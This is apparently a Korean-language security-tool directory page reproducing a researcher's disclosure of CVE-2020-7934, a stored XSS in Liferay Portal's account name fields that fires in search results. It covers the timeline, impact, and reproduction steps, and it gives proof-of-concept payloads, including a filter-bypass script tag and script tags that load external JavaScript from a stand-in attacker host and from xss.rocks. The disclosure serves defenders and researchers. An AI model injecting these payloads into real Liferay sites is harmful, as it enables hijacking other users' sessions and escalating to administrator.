Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 — LifeRay 7.2.0 GA1에서 MyAccountPortlet을 통해 검색 결과에 의해 실행되는 인증된 저장형 XSS | Kitploit
도구/GitHubGitHub/3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHub3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934

liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

LifeRay 7.2.0 GA1에서 MyAccountPortlet을 통해 검색 결과에 의해 실행되는 인증된 저장형 XSS

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
615년 전아직 검토되지 않음

LifeRay 7.2.1 GA2의 MyAccountPortlet을 통한 인증된 저장 XSS (검색 결과에 의해 실행됨)

LifeRay 버전 7.1.0부터 7.2.1 GA2까지, 사용자 계정의 First Name, Middle Name, Last Name 필드는 모두 저장 XSS 문제에 취약합니다. 모든 사용자는 특정 XSS 페이로드로 이 필드를 수정할 수 있으며, 이 페이로드는 데이터베이스에 저장되어 사용자를 "감염"시킵니다. 그런 다음 다른 사용자를 검색하기 위해 검색 기능을 사용할 때 페이로드가 렌더링됩니다. 감염된 사용자가 검색 결과에 표시되면 XSS 페이로드가 실행됩니다.

  • 저자/연구자: Casey Erdmann
  • 발견일: 10/17/2019
  • 최종 수정일: 10/05/2020
  • 비공개 공개일: 10/18/2019
  • 공개 공개일: 01/27/2020 (블로그 게시물)
  • 수정된 릴리스: 01/30/2020 Liferay Portal 7.3.0 GA1
  • 개념 증명 릴리스: 10/05/2020

영향

이 취약점을 통해 공격자는 검색을 통해 XSS 페이로드를 트리거하는 모든 사용자의 컨텍스트에서 임의 코드를 실행할 수 있습니다. 실질적인 측면에서 이는 권한이 없는 사용자에서 관리 사용자로의 권한 상승과 다른 계정 탈취를 통한 수평 이동으로 이어질 수 있습니다. 또한 JavaScript를 통해 실행될 수 있는 모든 것은 다른 사용자의 컨텍스트에서 악용될 수 있습니다.

개념 증명(PoC)에서 볼 수 있듯이 공격자는 기본 컨텍스트에서 외부 스크립트를 쉽게 로드할 수 있으므로 매우 취약합니다.

중요한 세션 쿠키의 대부분은 HTTPOnly로 설정되어 있어 단순한 세션 하이재킹 기술을 대부분 방지합니다. 하지만 구형 브라우저를 사용하는 사용자는 XST 공격으로 인해 더 큰 영향을 받을 수 있습니다.

관리 사용자는 Gogo Shell 및 Groovy Script 명령을 실행할 수 있으므로, 권한이 없는 사용자로부터 시작하여 이 익스플로잇을 이러한 정상적인 기능과 함께 사용하여 호스트 시스템에서 의도치 않은 RCE를 달성할 수도 있습니다.

재현 단계

이 취약점이 트리거되려면 두 가지 조건이 충족되어야 합니다:

  1. First, Middle, Last name 필드를 수정할 수 있는 사용자 계정에 접근할 수 있어야 합니다.
  2. 사용자가 LifeRay에서 검색 가능해야 합니다. 일반적으로 사이트에 추가되어야 함을 의미합니다. 기본적으로 사용자는 자신을 기본 사이트에 추가할 수 있으므로 추가 권한 없이 검색 가능하게 할 수 있습니다.

조건이 충족되면 다음 단계를 통해 취약점을 악용할 수 있습니다:

  1. 접근 가능한 사용자로 로그인합니다.
  2. 계정 설정 섹션으로 이동합니다.
    • 프로필 아이콘 > 계정 설정 클릭
    • URL은 다음과 같아야 합니다: http://mysite.com/user/hacker/manage?p_p_id=com_liferay_my_account_web_portlet_MyAccountPortlet&p_p_lifecycle=0&p_p_auth=??????
  3. 양식의 First, Middle 또는 Last Name 필드를 XSS 페이로드로 수정하고 (아래 예시 PoC 참조) 저장을 클릭합니다.
  4. 아직 사이트에 가입하지 않았다면 http://mysite.com/user/hacker/home/-/my_sites/sites/available-sites?_com_liferay_site_my_sites_web_portlet_MySitesPortlet_displayStyle=descriptive로 이동하여 오른쪽의 "세 점" 아이콘을 클릭하고 가입을 선택하여 가입할 수 있습니다.
  5. 사용자를 검색하여 XSS 페이로드를 트리거합니다: http://mysite.com/web/guest/search?q=<내 사용자>
    • 다른 사용자에 대한 영향을 시연하기 위한 테스트:
      • 두 번째 사용자로 로그인하여 "감염된 사용자"를 검색하면 해당 사용자의 컨텍스트에서도 XSS 페이로드가 실행됩니다.

PoC 단순 알림

  • <<SCRIPT>alert("XSS");//<</SCRIPT>

PoC 외부 스크립트 및 필터 우회

  • <SCRIPT SRC="//attacker.site/payload.js">
  • xss.rocks로 데모를 시도해보세요!
    • <SCRIPT SRC="//xss.rocks/xss.js"/>

보고서 버전 4.0

도구 다운로드